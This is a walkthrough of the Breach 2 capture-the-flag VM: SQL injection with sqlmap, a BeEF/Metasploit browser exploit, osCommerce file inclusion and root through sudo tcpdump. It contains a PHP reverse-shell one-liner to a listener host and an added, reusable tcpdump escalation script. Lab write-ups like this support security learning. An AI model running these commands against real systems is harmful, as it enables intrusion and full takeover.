Breach 2 is a frustratingly fun CTF and I hated loving every minute of it. It is a continuation of the Breach series, but there is no requirement to complete Breach 1 before starting this VM. This CTF has a good mix of client-side and server-side exploitation and a few things I have not seen in any other VM on VulnHub.

As always, I started out by using netdiscover to find the IP address of the VM, even though it is static and published in the README file. A quick nmap of the server (192.168.110.151) revealed only three open ports. Two of them were for rpcbind, which I couldn't find much to do with, and the last was SSH on port 65535. So the next step was to check out what was there.

root@kali:~# ssh -p65535 peter@192.168.110.151
#############################################################################
#                  Welcome to Initech Cyber Consulting, LLC                 #
#                 All connections are monitored and recorded                #
#                     Unauthorized access is encouraged                     #
#             Peter, if that's you - the password is in the source.         #
#          Also, stop checking your blog all day and enjoy your vacation!   #
#############################################################################
peter@192.168.110.151's password:
Permission denied, please try again.
peter@192.168.110.151's password:
Connection to 192.168.110.151 closed.

As you can see, the banner on the SSH port tells you there is a peter user and that his password is "in the source". I tested a bunch of combinations here but did not notice at first the "Connection to 192.168.110.151 closed." message on one of these attempts. As it turns out, the correct password opens another port and then disconnects you, so you cannot get a shell this way.

An nmap scan now shows that port 80 is open. Time for curl and dirb to see what's going on here. The index page has a hint about not trusting their users at Initech, and dirb quickly turns up /blog/.
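Because the login only changes the port list for a moment, it is easy to miss a new service when eyeballing two scans. The helper below is an added example, not part of the original writeup: it diffs two grepable nmap outputs (nmap -p- -oG before.gnmap TARGET, attempt the login, nmap -p- -oG after.gnmap TARGET) and prints what opened or closed in between. The two sample scans are constructed inline so it runs offline; the file names are my own.

```shell
#!/bin/sh
# Added example: diff the open ports between two `nmap -oG` scans.
# Usage: nmap -p- -oG before.gnmap TARGET ; <trigger> ; nmap -p- -oG after.gnmap TARGET
#        ./portdiff.sh demo   (runs against the constructed sample below)

# Print the open port numbers found in a grepable (-oG) nmap file, one per
# line, sorted so the two sets can be compared with grep.
open_ports() {
    grep -o '[0-9]*/open/' "$1" | cut -d/ -f1 | sort -u
}

# Ports that are open in the second scan but were not in the first.
new_ports() {
    before=$(open_ports "$1")
    if [ -z "$before" ]; then
        open_ports "$2"
    else
        # a multi-line -F pattern is treated as one pattern per line
        open_ports "$2" | grep -vxF -- "$before" || :
    fi
}

# Ports that were open in the first scan and are gone in the second.
closed_ports() {
    new_ports "$2" "$1"
}

# Constructed sample scans in nmap's -oG layout (before and after the SSH
# login that opened port 80), so the script can be tried without a target.
sample_scans() {
    cat > before.gnmap <<'EOF'
# Nmap scan initiated (constructed sample)
Host: 192.168.110.151 ()  Status: Up
Host: 192.168.110.151 ()  Ports: 111/open/tcp//rpcbind///, 65535/open/tcp//ssh///  Ignored State: closed (65533)
EOF
    cat > after.gnmap <<'EOF'
Host: 192.168.110.151 ()  Status: Up
Host: 192.168.110.151 ()  Ports: 80/open/tcp//http///, 111/open/tcp//rpcbind///, 65535/open/tcp//ssh///  Ignored State: closed (65532)
EOF
}

if [ "${1:-}" = "demo" ]; then
    sample_scans
    echo "newly open: $(new_ports before.gnmap after.gnmap | tr '\n' ' ')"
    echo "closed:     $(closed_ports before.gnmap after.gnmap | tr '\n' ' ')"
fi
```

Run it with a real pair of scans by passing the two -oG files to new_ports; the demo mode only exists to show the expected shape of the output (port 80 appearing after the login).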

Checking out the blog, I can see it is running software called BlogPHP with a 2006 copyright; since it is so old, it could easily have known exploits. Running "searchsploit blogphp" in Kali lists those exploits straight away. I pick the first one and feed the injectable URL to sqlmap with its dump-everything flag, --all (which has to sit outside the quoted URL).

sqlmap -u "http://192.168.110.151/blog/index.php?act=page&id=999999999" --all

To my surprise, sqlmap dumped all of the MySQL databases. The dump revealed a number of things. Firstly, there is an oscommerce database, but I cannot see the store on the Apache server. Closer inspection shows it is installed at /var/www/html2/oscommerce/, called Flair Store and owned by milton@breach.local; perhaps a vhost?

Looking through more of the sqlmap dump, I notice some BeEF hook references in the blog database. The searchsploit output also showed XSS exploits for the register page, which can be used to plant a BeEF hook. After waiting a few minutes, a connection shows up in BeEF for a client running Firefox 15. Luckily Metasploit has a module for just such an occasion.

Loading up "exploit/multi/browser/firefox_proto_crmfrequest" in Metasploit and using BeEF's invisible iframe feature, I was able to get a user shell on the machine. A few minutes after I start looking around the user account, the connection drops. I should know better: two shells are always better than one and give you a backup when you lose one. So I rinse and repeat the procedure.

As soon as I get another client shell, I run the following command to open a background process with a second reverse shell, pointed at a listener on 192.168.110.4:4444.

$ php -r '$sock=fsockopen("192.168.110.4",4444);exec("/bin/sh -i <&3 >&3 2>&3");' &

After an hour and a half of searching through the many things to look at on this server, I come up with an interesting list:
* Port 2323 is only open locally. It is a local telnet service that shows 29 45'46" N 95 22'59" W upon connection, followed by a login prompt.
* The user 'blumbergh' runs php-fpm but cannot log in directly.
* The user 'milton' has a Python script (/usr/local/bin/cd.py) that runs when he logs in. It asks a simple question and looks for a specific answer; if you answer correctly you get a shell and nginx is started.

So it seems we need to telnet to port 2323 and log in as milton. But what is the password? Well, the hint is a pair of GPS coordinates, which makes it pretty straightforward: they point at Houston.

telnet localhost 2323
Trying ::1...
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
29 45'46" N 95 22'59" W
breach2 login: milton
milton
Password: Houston

Last login: Tue Jun 28 01:18:43 EDT 2016 from localhost on pts/0
Linux breach2 3.16.0-4-amd64 #1 SMP Debian 3.16.7-ckt25-2 (2016-04-08) x86_64
29 45'46" N 95 22'59" W
3
2
1
Whose stapler is it?mine
mine
Woot!

Now that we are logged in as 'milton', it's time to run my reverse shell again (twice, unlike last time) so we have an easy way back in.

Since we know the 'blumbergh' user runs php-fpm, he seems like the next logical step. We can also see with the following command that he owns files in the /var/www/html2 folder.

find /var/www/html2 -user blumbergh 2>/dev/null

I forgot to take note of what port nginx was running on earlier, so I run a full-port nmap scan to find it.

nmap -sS -p- 192.168.110.151

We can see nginx running on port 8888. Throwing http://192.168.110.151:8888 into the browser confirms this, and osCommerce is there ready to be poked and prodded. Let's check the osCommerce version for exploits first. In the 'milton' shell, from the osCommerce directory, we run the following command.

grep -r 'PROJECT_VERSION' .
./includes/application_top.php:  define('PROJECT_VERSION', 'osCommerce Online Merchant v3.0a5');

Luckily we find "osCommerce 3.0a5 - Local File Inclusion / HTML Injection" with "searchsploit oscommerce".

Using this LFI to include the reverse shell I have used all the way through this (dropped in the /tmp directory), I get the next user, 'blumbergh', since that is the user running php-fpm. The first thing I like to check is whether they give us an easy sudo command.

$ sudo -l
sudo -l
Matching Defaults entries for blumbergh on breach2:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User blumbergh may run the following commands on breach2:
(root) NOPASSWD: /usr/sbin/tcpdump

That is obviously the next step in the VM, and a quick search reveals a nice way to abuse sudo tcpdump via the -z option, which makes tcpdump run a command of your choosing after each savefile rotation (-G sets the rotation interval in seconds). The callback is exec'd, so the script has to be executable, and it only fires once a packet arrives after the interval has elapsed. If the callback turns out to run as the unprivileged tcpdump user rather than root, add -Z root to keep root privileges. So let's reuse the shell we have used all through the CTF.

echo "#!/bin/bash" > /tmp/run.sh
echo "php /tmp/rshell.php" >> /tmp/run.sh
chmod +x /tmp/run.sh
sudo tcpdump -i eth0 -G1 -w /dev/null -z /tmp/run.sh
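The three lines above do the job, but the same escalation is worth wrapping up with the checks that make it repeatable. The script below is an added example of my own, not the writeup's commands: it confirms from sudo -l output that tcpdump really is NOPASSWD as root, writes an executable postrotate callback, and runs tcpdump with -W 1 (stop after the first rotation instead of firing the callback every second) and -Z root (stay root for the callback). The paths /tmp/run.sh and /tmp/proof.txt and the "run" mode are assumptions for this example; the sudo -l text it parses is constructed from the output shown above.

```shell
#!/bin/sh
# Added example: reusable tcpdump -z postrotate escalation with sanity checks.
# Usage: ./tcpdump_esc.sh run   (needs an interactive sudo-capable shell)

# Read `sudo -l` output on stdin and print the path of a tcpdump binary that
# may be run as root without a password; exit 1 if there is none.
find_nopasswd_tcpdump() {
    awk '/\(root\)[ \t]+NOPASSWD:/ {
            for (i = 1; i <= NF; i++)
                if ($i ~ /\/tcpdump$/) { print $i; found = 1 }
         }
         END { exit !found }'
}

# Write the postrotate callback. tcpdump execs it as `script <savefile>`,
# so the savefile argument ($1 inside the script) is simply ignored.
# It must be executable or the exec fails silently from our point of view.
write_postrotate() {
    script="$1"; payload="$2"
    printf '#!/bin/sh\n# run by tcpdump -z as root; $1 is the rotated savefile\n%s\n' "$payload" > "$script"
    chmod 755 "$script"
}

# Run tcpdump so it rotates once after a second (-G 1), quits after that one
# rotation (-W 1), keeps root for the callback (-Z root) and writes nothing
# useful (-w /dev/null). Rotation happens on the first packet after the
# interval, so pick an interface that actually sees traffic.
escalate() {
    tcpdump_bin="$1"; script="$2"; iface="${3:-eth0}"
    sudo "$tcpdump_bin" -i "$iface" -w /dev/null -G 1 -W 1 -z "$script" -Z root
}

if [ "${1:-}" = "run" ]; then
    bin=$(sudo -l | find_nopasswd_tcpdump) || { echo "no NOPASSWD tcpdump in sudo -l" >&2; exit 1; }
    # proof file first, then the same reverse shell used throughout (assumed path)
    write_postrotate /tmp/run.sh 'id > /tmp/proof.txt; php /tmp/rshell.php'
    escalate "$bin" /tmp/run.sh eth0
    sleep 2
    cat /tmp/proof.txt   # expect uid=0(root) here
fi
```

The proof file is there so you can tell a callback that ran as the tcpdump user (no -Z root) apart from one that ran as root before spending time on a reverse shell that never connects.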

And our instance of Metasploit now has shells for peter, milton, blumbergh and root. mrb3n813 also left a nice Python script for the final flag that you simply run to get a congratulations message.

This CTF VM has been one of my favourites, despite getting very frustrated a couple of times while doing it. I hear he is working on a "Breach 3", which I am sure will be more challenging and fun.